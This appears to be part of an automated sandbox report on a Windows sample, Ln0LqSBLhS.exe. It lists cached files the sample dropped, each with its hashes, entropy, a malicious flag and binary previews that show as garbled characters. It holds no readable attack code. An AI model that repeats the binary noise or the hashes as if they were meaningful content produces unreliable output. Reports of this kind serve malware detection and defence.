                                                                                                                                                                                                    Preview: tR...C#....<y......../.....y...iI5-..;*.......k....b...2..VT..P%Dk../.$......D...qw....,......h....H`.Gi[f9../.F...|+.Rx Y..s2.....$.../..e...f.........j...d../..<....`B|..H......1_..KK.B.....w..>.3.[.;..6.....)(!1.N..O....E.*..f.6C..Y..s.../,...U..S~......ANuS..A..).+.W.P.....'..k...)....%&...e......z1A'Z...W..S....j..S.^Xc8Bs.^=.Y..h.\@....#"..z.b.X...gG...,U1.((....9G.p...b.2a.NOo|H...ir....{1..c...q....I0`....MD.8?.b...H...0.E.(2..<.K.........Ey....\K.U.}.e....i.....E)..........wD...Bx...m...}...!f...q....b'.../...Y.b.\.4..B.cH6........*.A/..;TUH9...Q.uv......j@..r..B....:~......&~..G0..!.4OV.C[.....S.J8~w.#|.6a....'.....K_..".z../.I[.....\...L.6*.......6........=m...8.#.^..L]..9...d,.7*m[.o...^.@-q......B....M...q...@?...Y.......1.A,....Y<?s..}...jA...#.d.:..;..;d.o..........7.D..]7]....$....]b..Iw...,..QR.~5?L~.:.).[....Z.R7=...5....V.U..'.3g.;.d.q...Ra..R.^.X.D...!.:,.&.Am.Z.8.do...Q..\.....Du.....b.....h.)..o. ...>D']W..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\ai.0[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):97034
                                                                                                                                                                                                    Entropy (8bit):7.997779910379011
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:VnNXco6zjexph1BdiOX6bgJYki+vz1qaMfuR379PRbrikbs3GAye3oU/Vr:VNXco6zKHSdkVzSm9/t0Nom
                                                                                                                                                                                                    MD5:C243804C360E385346C5CD6517905635
                                                                                                                                                                                                    SHA1:7AD991DB36C254F49305A66E73970CBE44F71C16
                                                                                                                                                                                                    SHA-256:88E693A003AA183850C847756D6CD1D7589E5BF2279FB160028EB63BF25CA579
                                                                                                                                                                                                    SHA-512:FCA31244128CFB27EE5400C5DCD5201B6CEFD04F74A3BBCFF86BC4C31A01F3A3CDBB64AF9BE2706D11432D5A8C066C905D13B1B76360675FF21A30AED3B67756
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..V9[...a......[.x...TF.e.&...,z.~...9.I.0.1k.'{|$..X.Q...A.C!...R.L.....b...o.....#.m..W._.i`.....}.$....R6...Z`....HE...=..[.....QHM...,TL~............+...k<.dG....H.i...A...f.=..fN...J...../....).=.....[....=Ua.(....4U=.[..M.].T...27.n....M.'.Mk<.C..|.4....E.]!.f...o.v.r....P.......d..t.......].......d.....*._;DG.PZ.G...!.t.....+...Kz8}...`X./.6./0N.o.h.._d.Y0.<y.&.C...........%.T........26."..)..y..?G....X.6Y=.....m.D..K.....t.#.b..@..f.......h%..xr....Jf.;..v...q!..\^.8Y<iX:Vzd7...>g$.&.......8^wR0..t.X..[Sy=TH.-.#.=.....YS...,.v.3[./>..c....Q;.s.p<Z..nd.*70..9..Q.I....... .c.@...x....~3.....&.\.....\f.l..r..W%.G....UM!.....Jy(X,.........J3.,k..N...0..R.....#?z=.T...7..a.....-.G.H.....#.Q...Fw. ......j.F/b..~R.m...R..J........V...W/j..A U5.E.5....".y].5..e.Q.V.A>..i.-.+..4P.o..v...b.S.9...t(.[C..fmpQ...C..!b....xb..gG.....0.~`.;.v...+Z........F.~..?..8..r<u..|C.*^n/.....]w1!.h@c.k.(s....1N,3`..b?g5.<..\..R.L.0O.U|.k...Z...J"s{.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\azuremediaplayer.min[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998745405639065
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:2IyxXbwnGHR0mGxVYjmrjv8PjRDOIsUnbuCOn0k2nFlV+eYvX4Hy5qp8ZN:2rwGHFGxVBrOjRDOIs1CO0hnt4Xv57j
                                                                                                                                                                                                    MD5:3400F0FC3D66D5883B2DE921D33B00CC
                                                                                                                                                                                                    SHA1:E39BADC87755B188034662F540CBB737B5E265AA
                                                                                                                                                                                                    SHA-256:AFF08B143124902CAF5C7BD35159BB423BAFBD2175FEFA25808055D451818FBD
                                                                                                                                                                                                    SHA-512:07195B03F7590D64F7DA705BDB7723506107680B329A3BF9C27B494EB6E918752354E9DF61E777098E9CC6069404F7440D2D206C2E8F4D88E11A0067D804CF4E
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .u.,%..[.G....../.......5.F3a..>...~7q-.O.|6.3}.R.. Yc..q`.h...-.).....B.....(z........w.:9...|."./.... 7...?.(..m...4i/.."K..\T..k.l.-...!.....Qo...<F:..Q.)S 4.(@.6...v...V...i].;c..\.:...W0.._..o[:+4=.g....]....nS!...Yy..8..hn..e\6.\{.Mg.......Ph..../.U.$...m.w.R%N.S}....EE.....O"...N..I....!.LJ...=0.Q.OQP...^,`.^.>...sw.:L.y.c.L_^+Q...n..&..,....pZl."s.-.[7.E.A....vpO....@..V.j...!<...\.vc......7N.2D#PF....... .Z....t.$...B=..".g[.q.G.@|...2E..#........(...t.o...GQ..j....1s.E..?<Z..so....>}..........>>mw..3...>r....`O.{`x..&.y.L.e.p.R.}.Y....F.b.+.>w.@Z.......H..um&.}.{.....X....K.,-.n..r9I......k.>dj...I[...9-..'.SZ5. ...\+......@...0._..e.g8.8.O.8.....9..r... .A.p..&.......N....;..>*...%.....M...y}]..t6..f#... '.n......d4...8..Z..S..s.....r.W.4.p...U......,.R..x.G......w#.r.0^........0.....g[J..o..DC..h.mq.7s..a.....*..Y6qCo/.P..%........{#.+...i.[..5..<.c..Z6CP... ......E._.S.l..]P.!j...j.4y.gg..T.QbUR.\...EQ.......$,.i]>.w.K.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\cMhprsKTTOTsFvw2y_RLzosrqRw.gz[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1653
                                                                                                                                                                                                    Entropy (8bit):7.865391317952589
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:wxtguLoL3Ddox0CMdE6qv5dpNYnvFIlN6xCAJD:cquLydoTMdEDOnvoa3h
                                                                                                                                                                                                    MD5:12B49669EDC3F98AEBC62E76EFF2EAC5
                                                                                                                                                                                                    SHA1:ADC9B9B1AADA2697ACE0B54F123DBA5DC7E0169C
                                                                                                                                                                                                    SHA-256:CBC366BD34E74A21032343C06094D563F041EA455D249B6984AC8F967A62B859
                                                                                                                                                                                                    SHA-512:D5CFCB254A9DFDB8B66EBA798A105E2F349F9D8BE276D8A7D2254CCF3EF3F90B5B56CCF5687B0C43455B5F4F5AE132492641AF9D7C09AF335CC4752007359D78
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ...Zh.2.k;@i.......|.?H......&}.: .....y......T.!iS.Kz.M..G.ii.e.#.5h.oC?...1...w\"..F.8X...........'C...".C.n.+....To..%....II1;j0.?.z.6......;..T...(.<..j...c&..V..E..,.$-.?8........u.J.f.b.[..7.X..@....p.....)..........P...,O.E.Y...........^.....>....`....y..........*.h[3....v.u....j5"....."......'...FdJ.....z<,i[....1..K."/.!MP~.)..05...8.. .We....I.B.2-\......9QF.f......6..<....<....;...3.X;.....E0)..........p...Yq.[..J.g,l.p........r.....}.......l".|..9."@b..;..[.k.2.j..I.O...ni.[......(...1..s..&.GJ.............' -.dT...A....U.P...]......B:..-r ...Yr:.....].H.?.[.y..D.Q\..,H..X.b7.....c...6...Cb........$.S~3+-A..Q.Gf...M..j.G9..{..4.[..:..tg.n.7.X.>j.g .....>..u.g...1.Z.".t.9......99.{.M7....k...../.....`p..0../e...A.Ve.i....M..d..I%....]&`.._.R......-..\fP.....o.......l4va..>J.....9.....W.t...&.].G...I...3M..T....B`j..{..._...Q.7.z....{.....0.+....kr..w...DB...".*..2..&...W..]Wc4..].d{...\wMW.8...:...P...F...AI2i..Sn
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\chrome_safari-behavior[1].jpg
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):20606
                                                                                                                                                                                                    Entropy (8bit):7.990167992214385
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:384:VMHdb8C7o4pFuFHF6yXiU9uSrgEtV/O7w+98dqaQuWI+M1:ULn+HIoh9VrPbm78J
                                                                                                                                                                                                    MD5:47DD8CFFD7985FB94E4E3014A2ED9262
                                                                                                                                                                                                    SHA1:66030FB0D8E898F1D256C2DFAA43B6A2F7AB6D9E
                                                                                                                                                                                                    SHA-256:925ED8BE36BCA981C6AD56D61E1F6D773DB1C1D657613BBF6AA11A96A4D66F15
                                                                                                                                                                                                    SHA-512:6E275495D14AD98DC930DA796CE32C8C1472CEA7551249B627569F8D9231D7722651B25022CDD355A9C9F333A9BF56DFDB1583737519C69D54086CC1B5865E38
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .....s3..."..!c.B-.....:O.... ..E[.,..#q.kE.......w.G!.."D.uMF......H..)..I..7N5.."..'..}.Oy...WJ...$.O1C.'mQ..!......t.k.k.d..f.t..".$....7......zA.{?.r.o^.+/A..).?$.......:a=4...<FS.}PY.......:.....W0;...v..~G.=.e.......M.....)p...2-....@..+.P....Xh......7...O.oc..-......m....b..4....41...W..D..HZ7...k.[l(..X.w.O.SJ...M8.\.t!K.....h.o........5L...l.xf<P..G.)..22.....N........-Q.VH.L...4x(..W.9.!H...a5p.).....E..?........1...K.)]OD....&\I.S(@.I.@'.'%.HX..".-....2I...B.........Gee...{.GA..`.f.[N..H..`".#...!1...[w...X.A#7.E\.1..sGb.{............k.9.bv"..`.yE.k.u7.`0m,?..%...'..o;.i..w@c)*..*......v.#....CQV....!..Z..@/....T...4.:..........p..?>..2. ...:1?E.g..A...P..e.....C+...~..E.bM...m.p....r.T".Lc.q....L..U........o..0w.&E/X......kZiP..m.....'X......Q.9....W...8.&\..b..$.1~.z.H..7*\..S{..xO.R..w..A..hu.v..WPe.L..........!..q..`._S..4...<.m..e..4.../@b9.......f2R#...M..'.m$.6.&.....b....x..N..;.....Sr.w.1.F..)......R.4E{..<a.].:V..
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\chrome_throbber_fast[1].gif
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):4798
                                                                                                                                                                                                    Entropy (8bit):7.962258023217993
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:96:yiZq9pp8jw3z3cOl04UMmUH3Rj8/Wt/4J6QE4bvpu:/aKw3z3cOYk3RjQq/4QQjrpu
                                                                                                                                                                                                    MD5:9FBE466A8B60F137C69C68D9A243ACEE
                                                                                                                                                                                                    SHA1:3CA0116A755528C55694A7C047B4162293EAC330
                                                                                                                                                                                                    SHA-256:B83F188DA3C7CD91A5FB18472685C99911AC1E80610FC0A4C7FAB29496440FC4
                                                                                                                                                                                                    SHA-512:53EDB14822A5E55843AFA81E1F80D8CC6BE8E868E900927AC5E62D87D3E0C8392EAD0EAFD1EFEC9D96D9165EDE37FA134145149917E58E4BF52D9D5B1540F0B7
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: +....1.?......E......z....B.......xL...*@..}..u.~R...*"..i....va.M...d.!..AA.4...+..1.o...ep.^..8.cJ.).....$...:.d..zu..%k&&..d..S.a~...8....]..s.'q.]QH:m3P!.....~Xu...YP9G.I.\.|..&.NnM..0i `....V5...........~...f'.......b.<..yE...5.M..l,.....].w,.[.S...v.{4..^.s$Npa3Z;..5..Q..hKr..0^zq..L.c........=..z..M......8.Q)h...fK6B?Oz.).MO*..I..z.D...U.|...D.gt.E.=k\.F.T.)8..6kN...L......+..#..8@.....K....vyK.e........Mw.....s.B.l...T..!B.m`.....B....v.7........8$.?.=...%.FR.|.f.Y..$.<....:..^.5...RU....t.c.+&..8..q..7..J..N}%vAM..c...,;......'Q..h&C..r.n^.-...L%_.;z......Z.A.......5.......B..)..M............J........v"-.=o..V.C..".M...:).H..I%.BL.... ..Gp\..E.<:..1=Tp.|.v....z!..Mi.x..6].g.`.R.E.....\Q7jF..O..'.WH.7..y.!.....s...tJ.r...f.k|.......U.Go.]{.88.....}s...w....L.V.a.....2.S~...RW~.N./...}o.wt.!.2A..ydL.Jq..N.....F...F.>X...,..s......"0..{T<Z.....@...V..5..Q:hU...e.....f..e..]................~..5y..$....O.....qi3S(._.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\css[1].css
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1418
                                                                                                                                                                                                    Entropy (8bit):7.839296250698441
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:H/o5cpNOTB6LiLjtoLgZeTTKAbvULs4n5TXKU2gLssRAObD:foGpy6kjmLtTTfULz5TXgupD
                                                                                                                                                                                                    MD5:B8AD5619ED9C6FF762769D4087954ED8
                                                                                                                                                                                                    SHA1:BF5EF9B467373F2D9EAFE6BC9EB6FBDFD8527216
                                                                                                                                                                                                    SHA-256:629737F4D6CE54C76D014BA43D420AA8F0499A89E57117779689D125F286E00E
                                                                                                                                                                                                    SHA-512:19D870AC39B63A7E2D5108B832170AD421A18FE4F37996DF3F4994CD474F609598FD8EB393D971542E5AB9202E98F48824CD08116F5805B94E4FB6BA4914032B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..G2|.`Qk...-....0.5......5...=.2...d..[0h.e!.`R..........0|........(.V-....y.....-.\!...c.8.......F.A..;......5....l..,~"&........(Lfl...o^......3...A#_.LE.........Z.".....t.J../O.....N......p.a.H.]..)...z..D..G..c........L.i.Dg.9...%.y.o...Z..\@_./.\\.~..[0K/+3.0.q0".....jY...1n%.~...qE...-...0....V....w...(U.KY.u.X[....1...u.....3Gz.^..T......\i.,K.L........?..B...R#.^.4....D.(.......+.W..I...z...JgM!W.;..%.j.6..>...(..S..Q.....Z.aO"..(.{9#.....0.(..........gW.\...:......ed.b....zY....J...!1....*..,cU.....i$.q...RY..Q/... _.u....mrL.....$....W.h.9a<........TM....9..V....B0.8%.O{p....9_.PK...\..Q..1..9.K.L&......*..%........x.iw. ....+....P./.L.0I~a.o.............5V..W?..G.GS...!L..J#.......$...=.+.Cp.Ya.C...C7[u.;4..;..#G........W.j.cS.Qo.qX..4_Y.*4...;.....-L.%.(./.n.....#.>.t84.S@Y....lP:...%.p.N..WD*N......%.9..?..'.NI/.../s...+Q.K..YR#..Yl.$#.V.[...1...3.....Vv...J..+.!.8.!.R0...j~.....v.O....A.Y.....=.....f..9.d...V..........:JO.......8.^....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\e151e5[1].gif
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:DOS executable (COM, 0x8C-variant)
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):372
                                                                                                                                                                                                    Entropy (8bit):7.303029578675752
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:fRS7P/Fs0rC/9Q+SYVFa3WL1AT/dL0yW75xgiN9Q8DV4bHxXH75dExcii96Z:JS7FE/O+Sp41qVxi2kvDktkcii9a
                                                                                                                                                                                                    MD5:FD32AAE0CBB0EA68092D510BEA6975EB
                                                                                                                                                                                                    SHA1:A5DAA3B2077E20D3A0E2C14F612A5D0EDAF6647A
                                                                                                                                                                                                    SHA-256:F4E63405822D31F6ECA8961916FA04004F9D031DF4236642DAB694C43E42A22B
                                                                                                                                                                                                    SHA-512:DF2F9BF5616BF8B8C76FA21C340AEB2720139D90F12611AEA423B4363B2BF3F8BDF95CA75716AF552DCBB49DA1C9595439A6778D3E34760667EB30973A671078
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: .O...B......VSd....H^....Gu......j.+}.R...&...k{a~..Jb%!..D.(\.L|..=.;g].Sv."F.......Y..zu.h.1.C8/LQ>U._...A.p..m3e..l...+.y..WjT9...!~..(. 5.1......AWaCl.-1.l.....g..a.Q.^......Z...J?...=.q%S...+..t.Uo...aLR..Cd...h.@..R.)............H~h....X..+E....{7..>.....J.......w...L`.....5VPEIoxEWaaB5A242LGR5OT4EB7Eitq2rRK1LQCB{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\edge[1].htm
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):153934
                                                                                                                                                                                                    Entropy (8bit):7.998834036395245
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:3072:JCXv0BFlVHatlHAiN7AeyDVNfdcVss35lC3hmE+64lEAIwpZ3:JCf0d9k3JekzhB6HAl73
                                                                                                                                                                                                    MD5:BB519E7B64F42ABF6195925D26BA547A
                                                                                                                                                                                                    SHA1:7E81280821BE95816ED7C23B8BD40C980E6665F1
                                                                                                                                                                                                    SHA-256:641437EDF7C7828EF605A9962C7EAE815966A15E12B464664B5FD0525F1AB407
                                                                                                                                                                                                    SHA-512:7FF8FFEDA43FDF0117540B4AC53EF79352376052E22C60519BBE8279BF6563EF1E4368B7901ED3D75671DD837A13736699BC2D8DFA2D2E86898CC0A46630AF5C
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..h.5.Y.....O.@.)....Cb[..p.%.),A..$...). ....;...b.;..U2.... .'._..b..kk%S..kj..%W;..Fj&U...C.4.........:Y0.c..1E.1-......\.Nu.#.l.b.[...x.LB\.........p.4..3n..|l........y_.yI..8.&m.c.,*..<C}.Y6a.....r.a..z2....ze....'t.s>...#...@.....N...!.*..n ..~-p....l.)Z....N.S.m...o...8.(O=....@3k......6..I.b...ITD..f..A..8.b0I)g@...n.*c....n.).z.X..zp..;V.(6.]o.,%R.p...b FL.L^y.R56l.P*.$..z.H"..&.....b.~...H..&=.".Tk..@....rT`*.ql..>._f6.z...4f...6.k.j.....^..4A..(....x.7`i.09.<.8Q.U.2.P.....0H......f......|....A._.F..^.K..P..+.%..:....e.w=.......[..QF.....Z..;.....B.]....;......B.x.n.>7....PiQ3.8.}.....g..{?.K...a..<...A....:.:o...].o.N-..x.Hp....m~#y.(..`.m.QW....B.......6+^...O.p..P.l.pv.....h.O......$..........pv..jX".>.....=..~~.J.......?l....9..s.f..S.....#%....T......7W.......kNDdH....c.....j<...YD..7.........nj....h."M~alH..6.Q.F...,..:3...b.?b...~zs..)..+...e..k.0....MW.........|.|.I.{..3.....$C.!.$..!........]....6.,.h.].L.`....
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\fcmain[1].js
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):39366
                                                                                                                                                                                                    Entropy (8bit):7.995245502628932
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:768:s84SZuPRIPvgMSev3SBwFs+ruWEUQS6Bsa0d2cnDQ6+VrFq:CSZuZg7ivJUuslQ6+y
                                                                                                                                                                                                    MD5:E2AC15B2C160356EF73B2999868972E4
                                                                                                                                                                                                    SHA1:C1E138B609A388CC928457F2857381D47E741658
                                                                                                                                                                                                    SHA-256:1A1FFCA8BC1FA8D00E42BD66D6B16650D3D58F597C89AB2147BCBD81FCC33FEE
                                                                                                                                                                                                    SHA-512:A29F75A83A431D830A6DCDC65AEB6A8CA91D3E090817476326DEB912D1556F57DE87CCC4310A24522C78074349754D2FDBF93C4600FB1412C91F1C60261F1D7A
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: M.B......".mu.}5p....b...;.o....xhQ.+..o.;.....4....\...jj....xK..H..C...h.s...<.d.%C....@...yh...G9..X.`4........n..?.....+....J#.L.E..&.t.9..K....+......#...A....H.ud..{....J...&.Z|.._.(H....9..#j........I .......B..'....G&2.@..".....<.....L.....6EI....0..V.K.\4..,..z.....D..t..g....t..n..&Q......].|.x..)k...-..up.A....zi?..$..+...@..c#5i.R_.A.`.9.}...P..b.F.......g..g.#1..&cT..4C..+.R.)........] .h..d..n.#...k......O............s}.]G.'YvE..l}......q....~8P<.......4E.).x...Do@.......?e6|..?.y.-.^v-.l..\=.Oy..@...RG..z.~.[1.c...u..T....!~.%..wy.........e........m6.+.1....o....D(..%?.u..&-!.?......p... o?..}.._.O]A...?..$-......v.L....Z....0..@_>..}$.xn'<....,..r....-..*...s6U.`.oG-.1L.VY.........~<..p....7...A...ikJ.....KR.3.)V..1y.1..#..!}.}B....]..9&..j...r..4.?wo._~n/.._......~.{...w[?.^Z.K$I.....(j..^...w....Zn^....K...?....d..L.H.S..^>...}0[KPV.....!8..Yh.h..._ ...............}&...Z.631W.......7#.._j/tn9<..DT^..L0dqM..Vu>d..,.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\google-beta[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3079
                                                                                                                                                                                                    Entropy (8bit):7.942591816666211
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:48:gkB0Nk65rn/6AG8HTtpiVZkGv5S/KQJWRDLphGOZPw9rymN97w0YsSVQWLomDlWX:gk6k2/rYv5PQMXdPCHbMtWWLnla
                                                                                                                                                                                                    MD5:0E1E82BE4F68E7AB646C1C6CC5A9CBD1
                                                                                                                                                                                                    SHA1:1D2EEDDEC7956717B6D213C9D2153BC88D5F0206
                                                                                                                                                                                                    SHA-256:DF38568A47D0AD71BDA108FFAFAE5E0F4F41412705094F963BE4220E73380B3A
                                                                                                                                                                                                    SHA-512:A4C75B6E069E19410CCE9EDB411552C8790EEA866329A69ACB9243B77AF33338E0B4221183D4F1410F1FE1358F7B0E3D9BE9AF349DEE5233C8A33E815EFD4626
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..W.y.3 %....4.0\.>..;h.9W..(.6^.4..A..l..#.@+..;......S4.Q..o...8..+-._.~5.......x..8..W....cx...5./..:q.....eV......MNG....l....;..K.4.w...4.o.jp(c$e...*..U....#y.&.Y...c....s..37../uz....7..UJ......U) .$]..bL.c.x...s$.;`....f. .....=@y ...'\.MhS]4..I.nF0@.........b{N.S...q^....`..0>.7.....M...+..o!...D.Iu.a....D...p.F...F.....n.f.n...$....']...y.U.7#O...A.qT....o@....... ..w.xK......,Y.VvP...-.o!.....Sk..._c.h...3b*vA../?+Na......Q...L:......"..dj...Y..TpG.VF.C.hA,...3...Z..v.!._V.2#.....}x.....F@.9.w..J....@.geU...&u.d..a.b.M.a.{N..G.8;R\......_....m.(.a.....{.p....D...h............ql.X.[.|...q.."<...?.%m].j..[.H.......'...9...#...FZ..@......e...k.^.....4X........l&.....\.w...X...z.t.-Uq?...!G...C........o).*\k]y(n..<....5z....+.K.:)uJ.8@9e.<...}W..s....>e.Tt..T..S.....!q...aW:y...QMe)..V.v.M....q...]...)qAb...Fz..ya6.q.......&`......H%m?..7.....2..G"....T..BQ.Ls..A.*[..SDT..d./..J.3m:X.E...#IbX..=..D.....I+q.9.....=-...&.5h....DkO?..zH...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\hero-anim-top-right[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14811
                                                                                                                                                                                                    Entropy (8bit):7.987679810339294
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:8lEQD6zynOJ3Kr/HpsykP6WuExJY+G657:C/nO0Rt66WuiJY+157
                                                                                                                                                                                                    MD5:D630AFF807FA4A274A00E59F98E7280F
                                                                                                                                                                                                    SHA1:E64E98CEDAD40EE192A0B5D967BC5BAC734398C5
                                                                                                                                                                                                    SHA-256:AE5699177B4D5C3FD6A2BC99C6DE4759D5DCE814F9328ADE131082B66A316FA7
                                                                                                                                                                                                    SHA-512:34A69CF242CE97296639AA8AB56394C0A361A29B894FFFAB2C782A7267C671A19B7970FC111DB9B38CE61137BCEE8EFEB8F568E149EAEA7BF928D7DC39CE731E
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                    Preview: ..i.{.T...2&.e...m.6.]....@...&I.rfX..'..C......-.6y..3.:....@f2.[..-....r....?...C.|qr..b.f..BZ.....-.oG..9.0.......i.......m.c...8.S..~2.b.C....f.@.mvP.../...|.....tz;...(d..9...a.m`..%...#.EC.Jw..Hr..*....%K[..\.z.{,2..]..=..&B..-..@..4.._%q..R._s%...t.E.T...I.^..^.e..F..?.~ .{..n.....x:..W.....d4.>...._ .p...4.E.'\$c..`.A#.."...:....F...+.:}'...l...|K.29=..g5.....AM8.M......o..o.~...~.........1..m....S^....[n..4e...T..U=........0,.I..OsU..u v."....Q=.a...H......Wxt.e..\)......D...|...j:..d..X...N~.._b.x....q.z0..(a.x.G...(.......j.$..m.;I.....;...7........MC...9x.......-F...Y....+.5~.f...].n0..J..I.J|....>.P.\.z.....h2...FE....4...Z......../._.o..(K.'4l8......hM.J_..E* ...M.T....]1.._F]Q.g.v.....g..0....6.....C...76z=.dYG`-..Q.N..O.?...48..h..R3..s(..AW.j.TI.>(Y..wg4r....I...z..X>IH...`)K.{`....i..-e(C6.Or....r+.g=.!..."$=.m.Y.}%....UB......C.W..d.|%l......Q`$......%V..a3.b\........F.f..Iw.s..y(.i.s..j...b.r5..<r.8.f`q.{..K<`x
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Low\IE\86B850Z5\homepage_features[1].png
                                                                                                                                                                                                    Process:C:\Users\user\Desktop\Ln0LqSBLhS.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):6942
                                                                                                                                                                                                    Entropy (8bit):7.9748017260793285
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:zL153ZqCoGLNWQyfFAT/H1l46dJ3AN/gA:/gGLNW6/H1lfdOgA
                                                                                                                                                                                                    MD5:00979DD6BDB167B67F952C4F784AA30D
                                                                                                                                                                                                    SHA1:E184966DF2A58E8AE6E0C02F5183854C02D9752F
                                                                                                                                                                                                    SHA-256:6249D328FB7D53845680CE8D8AC7FB4DC0C7860CF7D3D423EB378383C2AAEAA6
                                                                                                                                                                                                    SHA-512:14758F7085A3DB18D7A32600928D09ED109EC5DDFC9CA95EA774F9BDEEDFBBB524B6A69865338C0018757BA543532D32AFAEA12AB4939B44DAEB78640D975331
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:unknown
